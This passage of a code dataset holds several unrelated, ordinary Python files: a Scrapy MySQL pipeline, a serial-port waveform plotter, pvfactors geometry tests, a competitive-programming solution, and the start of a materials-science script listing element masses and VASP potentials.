spider):\n        crawl_time = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n        item.update({\n            'spider_name': spider.name,\n            'crawl_time': crawl_time,\n            'update_time': crawl_time,\n        })\n        return item\n\n\nclass QpsPipeline:\n    def __init__(self, dbpool):\n        self.dbpool = dbpool\n\n    def process_item(self, item, spider):\n        \"\"\"\n        Use twisted to make the MySQL insert asynchronous: the connection pool runs the actual SQL and returns a deferred object\n        \"\"\"\n        query = self.dbpool.runInteraction(self.do_insert, item)\n        # add error handling (errors from the interaction go to handle_error)\n        query.addErrback(self.handle_error)\n        return item\n\n    @classmethod\n    def from_settings(cls, settings):\n        \"\"\"\n        Establish the database connection\n        :param settings: configuration parameters\n        :return: instantiated pipeline\n        \"\"\"\n        adbparams = dict(\n            host=settings['MYSQL_HOST'],\n            db=settings['MYSQL_DBNAME'],\n            user=settings['MYSQL_USER'],\n            password=settings['MYSQL_PASSWORD'],\n            cursorclass=pymysql.cursors.DictCursor  # specify the cursor type\n        )\n        dbpool = adbapi.ConnectionPool('pymysql', **adbparams)\n        return cls(dbpool)\n\n    def do_insert(self, cursor, item):\n        # perform the database operation; no explicit commit needed, twisted commits automatically\n        if type(item) == QpsItem:\n            self.insert_qipaoshui(cursor, item)\n        elif type(item) == QpsCommentItem:\n            self.insert_qipaoshui_comment(cursor, item)\n\n    def insert_qipaoshui(self, cursor, item):\n        insert_sql = \"\"\"\n            insert into qipaoshui(name,good_id,url,spider_name,crawl_time,update_time) values (%s,%s,%s,%s,%s,%s)\n        \"\"\"\n        cursor.execute(\n            insert_sql, (item['name'], item['good_id'],\n                         item['url'], item['spider_name'],\n                         item['crawl_time'], item['update_time']))\n\n    def insert_qipaoshui_comment(self, cursor, item):\n        insert_sql = \"\"\"\n        insert into qipaoshui_comment(name,comment_info,good_id,comment_type,spider_name,crawl_time,update_time) \n        values (%s,%s,%s,%s,%s,%s,%s)\n        \"\"\"\n        cursor.execute(\n            insert_sql,\n            (item['name'], item['comment_info'], item['good_id'],\n             item['comment_type'], item['spider_name'],\n             item['crawl_time'], item['update_time'],))\n\n    def handle_error(self, failure):\n        # error handling\n        if failure:\n            # print the error details\n            print(failure)\n","sub_path":"week10/Qps/Qps/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"240185269","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\nimport serial\r\nimport pyqtgraph as pg\r\nimport threading\r\nfrom time import sleep\r\nimport sys\r\n\r\n\"\"\"\r\nReadMe:\r\n\r\nRequires pyserial and pyqtgraph.\r\nWindows users can install them in administrator mode with `py -m pip install pyserial pyqtgraph`.\r\n\r\nUsage\r\nMethod 1. Command line. Example: `py myplot.pyw com3 9600`\r\nMethod 2. Edit the serial port and baud rate on lines 78 and 79 of the source file, then double-click to run.\r\n\r\n\"\"\"\r\n\r\n# Uses a ring-buffer (circular list) structure\r\n# data_index points to the oldest sample in data_list\r\n# data_index-1 points to the newest sample in data_list\r\nMax_count = 200 # maximum number of points shown on screen\r\ndata_list = [0] * 200 # stores all received data\r\ndata_index = 0\r\ndata_t = [0.1*i for i in range(200)]\r\nisDrawing = False\r\nisRunning = True\r\n\r\napp = pg.mkQApp()\r\nwin = pg.GraphicsWindow()\r\nwin.setWindowTitle(u'python示波器')\r\np = win.addPlot() # win.addPlot() adds one plot pane; calling it repeatedly splits the window into several panes\r\ncurve = p.plot() # add a new curve for the data\r\n# configure the waveform display\r\np.showGrid(x=True, y=True, alpha=0.5)\r\np.setLabels(left='voltage', bottom='t/ms', title='串口波形') # left: y-axis label, bottom: x-axis label\r\n# set the axis range\r\np.setRange(yRange=(0,3))\r\n\r\n# To change the curve shown on screen, just change the data stored in curve\r\ndef addToDisplay():\r\n    global isDrawing, data_list, data_index, data_t, Max_count, curve\r\n    isDrawing = True\r\n    _idx = data_index\r\n    _data = []\r\n\r\n    for i in range(_idx, _idx + Max_count):\r\n        _data.append(data_list[i%Max_count]/256*3)\r\n\r\n    isDrawing = False\r\n    curve.setData(data_t, _data)\r\n    \r\n\r\n    \r\ndef ComRecvDeal(com, baud, readtime):\r\n    global isDrawing, isRunning, data_list, data_index, Max_count\r\n    \r\n    try:\r\n        tty = serial.Serial(com, baud, timeout=readtime)\r\n    except:\r\n        print(\"串口 \" + com + \" 打开失败\")\r\n        sys.exit()\r\n\r\n    tty.flushInput() # clear the input buffer first\r\n    while isRunning:\r\n        if not isDrawing:\r\n            ch = tty.read()\r\n\t\t\t# check whether a byte was read\r\n            if ch:\r\n                num = ord(ch) # convert to a number\r\n\t\t\t\t# update the ring buffer\r\n                data_index = (data_index - 1) % Max_count\r\n                data_list[data_index] = num\r\n    tty.close() \r\n\r\nif __name__ == \"__main__\":\r\n    com = \"com4\"\r\n    baud = 9600\r\n    readtime = 0.1\r\n    if len(sys.argv) > 2:\r\n        com = sys.argv[1]\r\n        baud = sys.argv[2]\r\n\r\n    th = threading.Thread(target=ComRecvDeal, args=(com, baud, readtime)) # create the serial receive thread\r\n    th.start()\r\n    timer = pg.QtCore.QTimer()\r\n    timer.timeout.connect(addToDisplay)  # refresh the displayed data periodically\r\n    timer.start(10)\r\n    try:\r\n        sys.exit(app.exec_()) \r\n    except:\r\n        print(\"Program End.\")\r\n    finally:\r\n        timer.stop()\r\n        isRunning = False\r\n        th.join()\r\n","sub_path":"SerialPlot.py","file_name":"SerialPlot.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"410062800","text":"import os\nimport numpy as np\nfrom pvfactors.geometry import 
OrderedPVArray, PVGround, PVSurface\nfrom pvfactors.geometry.utils import contains\nfrom pvfactors.config import MAX_X_GROUND, MIN_X_GROUND\nfrom pvfactors.tests.test_geometry.test_data import \\\n vm_flat_orderedpvarray, vm_right_orderedpvarray\n\n\ndef test_ordered_pvarray_from_dict(params):\n \"\"\"Test that can successfully create ordered pvarray from parameters dict,\n and that the axis azimuth convention works correctly (via normal vector)\n \"\"\"\n pvarray = OrderedPVArray.from_dict(params)\n\n # Test that ground is created successfully\n assert isinstance(pvarray.ground, PVGround)\n assert pvarray.ground.length == (MAX_X_GROUND - MIN_X_GROUND)\n\n # Test the front and back sides\n assert len(pvarray.pvrows) == 3\n np.testing.assert_array_equal(\n pvarray.pvrows[0].front.n_vector, -pvarray.pvrows[0].back.n_vector)\n assert pvarray.pvrows[0].front.shaded_length == 0\n assert pvarray.gcr == params['gcr']\n assert pvarray.surface_tilt == params['surface_tilt']\n assert pvarray.surface_azimuth == params['surface_azimuth']\n assert pvarray.solar_zenith == params['solar_zenith']\n assert pvarray.solar_azimuth == params['solar_azimuth']\n assert pvarray.pvrows[0].front.n_vector[0] > 0\n\n # Orient the array the other way\n params.update({'surface_azimuth': 270.})\n pvarray = OrderedPVArray.from_dict(params)\n assert pvarray.pvrows[0].front.n_vector[0] < 0\n\n\ndef test_plot_ordered_pvarray():\n \"\"\"Test that ordered pv array plotting works correctly\"\"\"\n is_ci = os.environ.get('CI', False)\n if not is_ci:\n import matplotlib.pyplot as plt\n\n # Create base params\n params = {\n 'n_pvrows': 3,\n 'pvrow_height': 2.5,\n 'pvrow_width': 2.,\n 'surface_azimuth': 90., # east oriented modules / point right\n 'axis_azimuth': 0., # axis of rotation towards North\n 'surface_tilt': 20.,\n 'gcr': 0.4,\n 'solar_zenith': 20.,\n 'solar_azimuth': 90., # sun located in the east\n 'rho_ground': 0.2,\n 'rho_front_pvrow': 0.01,\n 'rho_back_pvrow': 0.03\n }\n\n # Plot simple ordered pv array\n ordered_pvarray = OrderedPVArray.from_dict(params)\n f, ax = plt.subplots()\n ordered_pvarray.plot(ax)\n plt.show()\n\n # Plot discretized ordered pv array\n params.update({'cut': {0: {'front': 5}, 1: {'back': 3}},\n 'surface_azimuth': 270.}) # point left\n ordered_pvarray = OrderedPVArray.from_dict(params)\n f, ax = plt.subplots()\n ordered_pvarray.plot(ax)\n plt.show()\n\n\ndef test_discretization_ordered_pvarray(discr_params):\n pvarray = OrderedPVArray.from_dict(discr_params)\n pvrows = pvarray.pvrows\n\n assert len(pvrows[0].front.list_segments) == 5\n assert len(pvrows[0].back.list_segments) == 1\n assert len(pvrows[1].back.list_segments) == 3\n\n\ndef test_ordered_pvarray_gnd_shadow_casting(params):\n \"\"\"Test shadow casting on ground, no inter-row shading\"\"\"\n\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params)\n ordered_pvarray.cast_shadows()\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 3\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 4\n assert ordered_pvarray.ground.shaded_length == 6.385066634855475\n assert ordered_pvarray.illum_side == 'front'\n\n\ndef test_ordered_pvarray_gnd_pvrow_shadow_casting_right(params_direct_shading):\n\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params_direct_shading)\n ordered_pvarray.cast_shadows()\n # Check shadow casting on ground\n assert 
len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 1\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 2\n assert ordered_pvarray.ground.length == MAX_X_GROUND - MIN_X_GROUND\n\n assert ordered_pvarray.illum_side == 'front'\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].back.shaded_length, 0.)\n\n\ndef test_ordered_pvarray_gnd_pvrow_shadow_casting_left(params_direct_shading):\n\n params_direct_shading.update({'solar_azimuth': 270,\n 'surface_azimuth': 270})\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params_direct_shading)\n ordered_pvarray.cast_shadows()\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 1\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 2\n assert ordered_pvarray.ground.length == MAX_X_GROUND - MIN_X_GROUND\n\n assert ordered_pvarray.illum_side == 'front'\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].back.shaded_length, 0.)\n\n\ndef test_ordered_pvarray_gnd_pvrow_shadow_casting_back(params_direct_shading):\n\n params_direct_shading.update({'solar_azimuth': 270,\n 'surface_tilt': 120})\n\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params_direct_shading)\n ordered_pvarray.cast_shadows()\n assert ordered_pvarray.illum_side == 'back'\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 1\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 2\n assert ordered_pvarray.ground.length == MAX_X_GROUND - MIN_X_GROUND\n\n # Shading length should be identical as in previous test for front surface,\n # but now with back surface\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].back.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].back.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].front.shaded_length, 0.)\n\n\ndef test_ordered_pvarray_gnd_pvrow_shadow_casting_right_n_seg(\n params_direct_shading):\n\n params_direct_shading.update({'cut': {1: {'front': 7}}})\n # Test front shading on right\n ordered_pvarray = 
OrderedPVArray.from_dict(params_direct_shading)\n ordered_pvarray.cast_shadows()\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 1\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 2\n assert ordered_pvarray.ground.length == MAX_X_GROUND - MIN_X_GROUND\n\n assert ordered_pvarray.illum_side == 'front'\n # Test pvrow sides: should be the same as without segments\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].front.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].back.shaded_length, 0.)\n\n # Test individual segments\n center_row = ordered_pvarray.pvrows[1]\n list_pvsegments = center_row.front.list_segments\n fully_shaded_segment = list_pvsegments[-1]\n partial_shaded_segment = list_pvsegments[-2]\n assert fully_shaded_segment.illum_collection.is_empty\n np.testing.assert_almost_equal(\n fully_shaded_segment.shaded_collection.length,\n list_pvsegments[0].length)\n assert partial_shaded_segment.shaded_collection.length > 0\n assert partial_shaded_segment.illum_collection.length > 0\n sum_lengths = (partial_shaded_segment.illum_collection.length +\n partial_shaded_segment.shaded_collection.length)\n np.testing.assert_almost_equal(sum_lengths, list_pvsegments[0].length)\n\n\ndef test_ordered_pvarray_gnd_pvrow_shadow_casting_back_n_seg(\n params_direct_shading):\n\n params_direct_shading.update({'cut': {1: {'back': 7}},\n 'solar_azimuth': 270,\n 'surface_tilt': 120})\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params_direct_shading)\n ordered_pvarray.cast_shadows()\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 1\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 2\n assert ordered_pvarray.ground.length == MAX_X_GROUND - MIN_X_GROUND\n\n assert ordered_pvarray.illum_side == 'back'\n # Shading length should be identical as in previous test for front surface,\n # but now with back surface\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].back.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].back.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].front.shaded_length, 0.)\n\n # Test individual segments\n center_row = ordered_pvarray.pvrows[1]\n list_pvsegments = center_row.back.list_segments\n fully_shaded_segment = list_pvsegments[-1]\n partial_shaded_segment = list_pvsegments[-2]\n assert fully_shaded_segment.illum_collection.is_empty\n np.testing.assert_almost_equal(\n fully_shaded_segment.shaded_collection.length,\n list_pvsegments[0].length)\n assert partial_shaded_segment.shaded_collection.length > 0\n assert 
partial_shaded_segment.illum_collection.length > 0\n sum_lengths = (partial_shaded_segment.illum_collection.length +\n partial_shaded_segment.shaded_collection.length)\n np.testing.assert_almost_equal(sum_lengths, list_pvsegments[0].length)\n\n\ndef test_ordered_pvarray_cuts_for_pvrow_view(ordered_pvarray):\n \"\"\"Test that pvarray ground is cut correctly\"\"\"\n\n ordered_pvarray.cast_shadows()\n n_surfaces_0 = ordered_pvarray.ground.n_surfaces\n len_0 = ordered_pvarray.ground.length\n ordered_pvarray.cuts_for_pvrow_view()\n n_surfaces_1 = ordered_pvarray.ground.n_surfaces\n len_1 = ordered_pvarray.ground.length\n\n assert n_surfaces_1 == n_surfaces_0 + 3\n assert len_1 == len_0\n\n\ndef test_ordered_pvarray_list_surfaces(ordered_pvarray):\n \"\"\"Check that getting a correct list of surfaces\"\"\"\n ordered_pvarray.cast_shadows()\n n_surfaces = ordered_pvarray.n_surfaces\n list_surfaces = ordered_pvarray.all_surfaces\n\n assert isinstance(list_surfaces, list)\n assert len(list_surfaces) == n_surfaces\n assert isinstance(list_surfaces[0], PVSurface)\n\n\ndef test_build_surface_registry(ordered_pvarray):\n \"\"\"Test that building surface registry correctly\"\"\"\n\n ordered_pvarray.cast_shadows()\n reg = ordered_pvarray.surface_registry\n\n assert reg.shape[0] == ordered_pvarray.n_surfaces\n assert reg.shape[1] == len(ordered_pvarray.registry_cols)\n\n\ndef test_get_all_surface_indices(ordered_pvarray):\n\n # Complete array\n ordered_pvarray.cast_shadows()\n ordered_pvarray.cuts_for_pvrow_view()\n\n # Check surface indices before indexing\n surf_indices = ordered_pvarray.surface_indices\n assert surf_indices == [None] * ordered_pvarray.n_surfaces\n\n # Check surface indices after indexing\n ordered_pvarray.index_all_surfaces()\n surf_indices = ordered_pvarray.surface_indices\n np.testing.assert_array_equal(surf_indices,\n range(ordered_pvarray.n_surfaces))\n\n\ndef test_view_matrix_flat(params):\n\n # Make flat\n params.update({'surface_tilt': 0})\n\n # Create pvarray\n pvarray = OrderedPVArray.from_dict(params)\n\n # Create shadows and pvrow cuts\n pvarray.cast_shadows()\n pvarray.cuts_for_pvrow_view()\n\n # Build view matrix\n vm = pvarray.view_matrix\n\n assert vm.shape[0] == pvarray.n_surfaces + 1\n np.testing.assert_array_equal(vm, vm_flat_orderedpvarray)\n\n\ndef test_view_matrix(params):\n\n params.update({'surface_azimuth': 270})\n\n # Create pvarray\n pvarray = OrderedPVArray.from_dict(params)\n\n # Create shadows and pvrow cuts\n pvarray.cast_shadows()\n pvarray.cuts_for_pvrow_view()\n\n # Build view matrix and obstruction matrix\n vm, om = pvarray._build_view_matrix()\n\n assert vm.shape[0] == pvarray.n_surfaces + 1\n np.testing.assert_array_equal(vm, vm_right_orderedpvarray)\n # The view matrix mask should be symmetric\n mask_vm = np.where(vm != 0, 1, 0)\n np.testing.assert_array_equal(mask_vm[:-1, :-1], mask_vm.T[:-1, :-1])\n # Removing sky row and column because didn't fill the last row\n\n # The obstruction matrix should be symmetric\n np.testing.assert_array_equal(om, om.T)\n # TODO: test values against saved array\n\n\ndef test_surface_params(params):\n\n surface_params = ['qinc']\n pvarray = OrderedPVArray.from_dict(params, surface_params=surface_params)\n pvarray.cast_shadows()\n pvarray.cuts_for_pvrow_view()\n\n # Set all surfaces parameters to 1\n pvarray.update_params({'qinc': 1})\n\n # Check that all surfaces of the correct surface params\n all_surfaces = pvarray.all_surfaces\n for surf in all_surfaces:\n assert surf.surface_params == surface_params\n assert 
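# A minimal, self-contained sketch of the reciprocity property the view-matrix
# tests above assert: if surface i can see surface j then j can see i, so the
# boolean mask of the view matrix (sky row and column dropped) must equal its
# own transpose. The 4x4 matrix below is made up for illustration, not
# pvfactors output.
import numpy as np

vm = np.array([
    [0.0, 0.2, 0.0, 0.8],   # last row/column plays the role of the sky
    [0.1, 0.0, 0.3, 0.6],
    [0.0, 0.4, 0.0, 0.6],
    [0.0, 0.0, 0.0, 0.0],
])
mask_vm = np.where(vm != 0, 1, 0)
np.testing.assert_array_equal(mask_vm[:-1, :-1], mask_vm.T[:-1, :-1])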
surf.get_param('qinc') == 1\n\n # Check weighted values\n np.testing.assert_almost_equal(\n pvarray.ground.get_param_weighted('qinc'), 1)\n np.testing.assert_almost_equal(\n pvarray.ground.get_param_ww('qinc'),\n pvarray.ground.length)\n for pvrow in pvarray.pvrows:\n # Front\n np.testing.assert_almost_equal(\n pvrow.front.get_param_weighted('qinc'), 1)\n np.testing.assert_almost_equal(\n pvrow.front.get_param_ww('qinc'), pvrow.front.length)\n # Back\n np.testing.assert_almost_equal(\n pvrow.back.get_param_weighted('qinc'), 1)\n np.testing.assert_almost_equal(\n pvrow.back.get_param_ww('qinc'), pvrow.back.length)\n\n\ndef test_orderedpvarray_neighbors(params):\n \"\"\"Check that pvrow neighbors are determined correctly\"\"\"\n\n pvarray_right = OrderedPVArray.from_dict(params)\n params.update({'surface_azimuth': 270})\n pvarray_left = OrderedPVArray.from_dict(params)\n\n # Check\n l1 = [None, 0, 1]\n l2 = [1, 2, None]\n np.testing.assert_array_equal(pvarray_right.front_neighbors, l2)\n np.testing.assert_array_equal(pvarray_right.back_neighbors, l1)\n np.testing.assert_array_equal(pvarray_left.front_neighbors, l1)\n np.testing.assert_array_equal(pvarray_left.back_neighbors, l2)\n\n\ndef test_orderedpvarray_almost_flat():\n \"\"\"Making sure that things are correct when the pvarray is almost flat\n and the sun is very low, which means that the shadows on the ground, and\n the edge points will be outside of ground range (since not infinite)\"\"\"\n\n params = {\n 'n_pvrows': 3,\n 'pvrow_height': 2.5,\n 'pvrow_width': 2.,\n 'surface_azimuth': 90., # east oriented modules\n 'axis_azimuth': 0., # axis of rotation towards North\n 'surface_tilt': 0.01, # almost flat\n 'gcr': 0.4,\n 'solar_zenith': 89.9, # sun super low\n 'solar_azimuth': 90., # sun located in the east\n }\n\n pvarray = OrderedPVArray.from_dict(params)\n pvarray.cast_shadows()\n pvarray.cuts_for_pvrow_view()\n view_matrix = pvarray.view_matrix\n\n ground_seg = pvarray.ground.list_segments[0]\n # there should be no visible shadow on the ground\n assert len(ground_seg.shaded_collection.list_surfaces) == 0\n # all of the edge points should be outside of range of ground geometry\n for edge_pt in pvarray.edge_points:\n assert not contains(pvarray.ground.original_linestring, edge_pt)\n\n # Check values of view matrix mask, to make sure that front does not\n # see the ground\n vm_mask = np.where(view_matrix > 0, 1, 0)\n expected_vm_mask = [\n [0, 0, 1, 0, 1, 0, 1, 1], # ground\n [0, 0, 0, 0, 1, 0, 0, 1], # front\n [1, 0, 0, 0, 0, 0, 0, 1], # back\n [0, 0, 0, 0, 0, 0, 1, 1], # front\n [1, 1, 0, 0, 0, 0, 0, 1], # back\n [0, 0, 0, 0, 0, 0, 0, 1], # front\n [1, 0, 0, 1, 0, 0, 0, 1], # back\n [0, 0, 0, 0, 0, 0, 0, 0]]\n np.testing.assert_array_equal(vm_mask, expected_vm_mask)\n\n\ndef test_time_ordered_pvarray(params):\n\n # params.update({'surface_tilt': 0})\n from pvfactors.viewfactors import VFCalculator\n\n import time\n n = 100\n list_elapsed = []\n for _ in range(n):\n tic = time.time()\n pvarray = OrderedPVArray.from_dict(params)\n pvarray.cast_shadows() # time consuming in pvarray creation\n pvarray.cuts_for_pvrow_view()\n pvarray.index_all_surfaces()\n # sr = pvarray.surface_registry\n # vm = pvarray.view_matrix\n vm, om = pvarray._build_view_matrix()\n geom_dict = pvarray.dict_surfaces\n\n calculator = VFCalculator()\n # number 1 time consuming, triples run time\n vf_matrix = calculator.get_vf_matrix(geom_dict, vm, om,\n pvarray.pvrows)\n toc = time.time()\n list_elapsed.append(toc - tic)\n\n print(\"\\nAvg time elapsed: {} 
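# A hedged sketch of the benchmarking pattern in test_time_ordered_pvarray
# above: run a callable n times and report the mean wall-clock time. The
# sorting workload here is a stand-in for the pvarray construction.
import time
import random

def mean_elapsed(fn, n=100):
    elapsed = []
    for _ in range(n):
        tic = time.time()
        fn()                      # the timed workload
        elapsed.append(time.time() - tic)
    return sum(elapsed) / len(elapsed)

avg = mean_elapsed(lambda: sorted(random.random() for _ in range(1000)))
print("\nAvg time elapsed: {} s".format(avg))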
s\".format(np.mean(list_elapsed)))\n","sub_path":"pvfactors/tests/test_geometry/test_pvarray.py","file_name":"test_pvarray.py","file_ext":"py","file_size_in_byte":19273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"227203636","text":"#!/usr/bin/python3\r\n# わ~~~~~からんですわ~~~~~~~\r\nfrom collections import Counter\r\nN = int(input())\r\nA = list(input().split())\r\nfor k in range(N):\r\n ans = 0\r\n A_copy=sorted(A)\r\n A_copy.remove(A[k])\r\n c = Counter(A_copy) #dict\r\n for l in c.keys():\r\n ans+= ( c[l] * (c[l]-1) ) / 2 \r\n print(int(ans))","sub_path":"ABC159/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"549720524","text":"import numpy as np\nfrom scipy.optimize import linprog\nfrom numpy.linalg import solve\nfrom fractions import Fraction\nimport traceback\nimport signal\nimport sys\nimport os\nimport shutil\nimport time\nimport json\nimport urllib\nimport requests\nfrom urllib.request import urlopen,Request,urlretrieve\nfrom aflow import *\n\nMM_of_Elements = {'H': 1.00794, 'He': 4.002602, 'Li': 6.941, 'Be': 9.012182, 'B': 10.811, 'C': 12.0107, 'N': 14.0067,\n 'O': 15.9994, 'F': 18.9984032, 'Ne': 20.1797, 'Na': 22.98976928, 'Mg': 24.305, 'Al': 26.9815386,\n 'Si': 28.0855, 'P': 30.973762, 'S': 32.065, 'Cl': 35.453, 'Ar': 39.948, 'K': 39.0983, 'Ca': 40.078,\n 'Sc': 44.955912, 'Ti': 47.867, 'V': 50.9415, 'Cr': 51.9961, 'Mn': 54.938045,\n 'Fe': 55.845, 'Co': 58.933195, 'Ni': 58.6934, 'Cu': 63.546, 'Zn': 65.409, 'Ga': 69.723, 'Ge': 72.64,\n 'As': 74.9216, 'Se': 78.96, 'Br': 79.904, 'Kr': 83.798, 'Rb': 85.4678, 'Sr': 87.62, 'Y': 88.90585,\n 'Zr': 91.224, 'Nb': 92.90638, 'Mo': 95.94, 'Tc': 98.9063, 'Ru': 101.07, 'Rh': 102.9055, 'Pd': 106.42,\n 'Ag': 107.8682, 'Cd': 112.411, 'In': 114.818, 'Sn': 118.71, 'Sb': 121.760, 'Te': 127.6,\n 'I': 126.90447, 'Xe': 131.293, 'Cs': 132.9054519, 'Ba': 137.327, 'La': 138.90547, 'Ce': 140.116,\n 'Pr': 140.90465, 'Nd': 144.242, 'Pm': 146.9151, 'Sm': 150.36, 'Eu': 151.964, 'Gd': 157.25,\n 'Tb': 158.92535, 'Dy': 162.5, 'Ho': 164.93032, 'Er': 167.259, 'Tm': 168.93421, 'Yb': 173.04,\n 'Lu': 174.967, 'Hf': 178.49, 'Ta': 180.9479, 'W': 183.84, 'Re': 186.207, 'Os': 190.23, 'Ir': 192.217,\n 'Pt': 195.084, 'Au': 196.966569, 'Hg': 200.59, 'Tl': 204.3833, 'Pb': 207.2, 'Bi': 208.9804,\n 'Po': 208.9824, 'At': 209.9871, 'Rn': 222.0176, 'Fr': 223.0197, 'Ra': 226.0254, 'Ac': 227.0278,\n 'Th': 232.03806, 'Pa': 231.03588, 'U': 238.02891, 'Np': 237.0482, 'Pu': 244.0642, 'Am': 243.0614,\n 'Cm': 247.0703, 'Bk': 247.0703, 'Cf': 251.0796, 'Es': 252.0829, 'Fm': 257.0951, 'Md': 258.0951,\n 'No': 259.1009, 'Lr': 262, 'Rf': 267, 'Db': 268, 'Sg': 271, 'Bh': 270, 'Hs': 269, 'Mt': 278,\n 'Ds': 281, 'Rg': 281, 'Cn': 285, 'Nh': 284, 'Fl': 289, 'Mc': 289, 'Lv': 292, 'Ts': 294, 'Og': 294,\n 'ZERO': 0}\n\nvaspPot = {\"H\" : \"H\" ,\n\"He\" : \"He\" ,\n\"Li\" : \"Li_sv\" ,\n\"Be\" : \"Be\" ,\n\"B\" : \"B\" ,\n\"C\" : \"C\" ,\n\"N\" : \"N\" ,\n\"O\" : \"O\" ,\n\"F\" : \"F\" ,\n\"Ne\" : \"Ne\" ,\n\"Na\" : \"Na_pv\" ,\n\"Mg\" : \"Mg\" ,\n\"Al\" : \"Al\" ,\n\"Si\" : \"Si\" ,\n\"P\" : \"P\" ,\n\"S\" : \"S\" ,\n\"Cl\" : \"Cl\" ,\n\"Ar\" : \"Ar\" ,\n\"K\" : \"K_sv\" ,\n\"Ca\" : \"Ca_sv\" ,\n\"Sc\" : \"Sc_sv\" ,\n\"Ti\" : \"Ti_sv\" ,\n\"V\" : \"V_sv\" ,\n\"Cr\" : \"Cr_pv\" ,\n\"Mn\" : \"Mn_pv\" ,\n\"Fe\" : \"Fe\" ,\n\"Co\" : \"Co\" ,\n\"Ni\" : \"Ni\" ,\n\"Cu\" : \"Cu\" ,\n\"Zn\" : \"Zn\" ,\n\"Ga\" : \"Ga_d\" ,\n\"Ge\" : 
